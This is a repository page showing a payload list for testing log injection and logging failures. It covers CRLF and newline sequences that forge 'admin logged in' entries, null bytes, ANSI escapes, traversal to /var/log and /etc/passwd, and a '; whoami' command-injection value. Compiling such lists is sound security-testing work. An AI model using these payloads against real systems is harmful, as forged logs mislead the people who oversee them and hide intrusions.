0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
274734e91a6cefca4892ab19209197cce8cee0d8
hunting/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt
T
copilot-swe-agent[bot] dbf612f6b1 Fix code review comments: improve formatting and use placeholder values 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-01-04 18:26:37 +00:00

52 lines
1.2 KiB
Plaintext
Raw Blame History

# Log Injection Payloads
# CRLF injection in logs
\r\n
\r\nUser: admin logged in successfully
%0d%0a
%0d%0aAuthentication successful for admin
# Log poisoning
\nuser=admin authenticated=true\n
\r\nSUCCESS: Admin login\r\n
%0auser:admin%0astatus:success%0a
# Log format manipulation
admin\nAuthenticated:true
test\r\nRole:administrator
# Time-based log injection
[2023-01-01 00:00:00] User admin logged in successfully
[CRITICAL] Unauthorized access detected
# Null byte injection in logs
admin\x00
user\x00admin
# ANSI escape sequences (log injection)
\x1b[31mCRITICAL\x1b[0m
\033[1;31mALERT\033[0m
# Log file path traversal
../../logs/application.log
/var/log/auth.log
../../../var/log/syslog
# Events to test if they appear in logs
# Try these payloads and verify they are logged appropriately:
# - Failed login attempts
# - Successful login
# - Password changes
# - Privilege escalation attempts
# - Administrative actions
# - Access to sensitive data
# - Invalid input
# - Authentication failures
# - Authorization failures
# Sample payloads to check logging behavior
SELECT * FROM users WHERE username='admin' AND password='wrong'
<script>alert('XSS')</script>
../../../etc/passwd
; whoami
Reference in New Issue View Git Blame Copy Permalink